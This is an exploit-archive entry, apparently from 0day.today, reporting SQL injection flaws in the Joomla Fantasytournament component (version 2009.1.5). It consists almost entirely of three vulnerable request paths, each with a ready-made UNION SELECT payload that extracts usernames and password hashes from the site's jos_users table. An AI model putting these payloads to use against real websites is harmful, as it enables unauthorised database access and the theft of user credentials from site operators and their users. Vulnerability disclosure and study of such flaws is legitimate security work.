Joomla Component Fantasytournament SQL Injection Vulnerabilities

2009-01-14T00:00:00
ID 1337DAY-ID-4668
Type zdt
Reporter [email protected]
Modified 2009-01-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Joomla Component Fantasytournament SQL Injection Vulnerabilities
================================================================


#############################################################################
#							                    #
# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: [email protected]

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "Fantasytournament (com_fantasytournament)"
[~] Version:        "2009.1.5" 
[~] Date:           "01/01/2009"
[~] Author:         "Adrian Gray"
[~] Author E-mail:  "[email protected]"
[~] Author URL:     "www.graymoose.com"
[~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details"

########################################

[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]
[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--

########################################

[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]
[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--

########################################

[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]
[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--

########################################



#  0day.today [2018-01-01]  #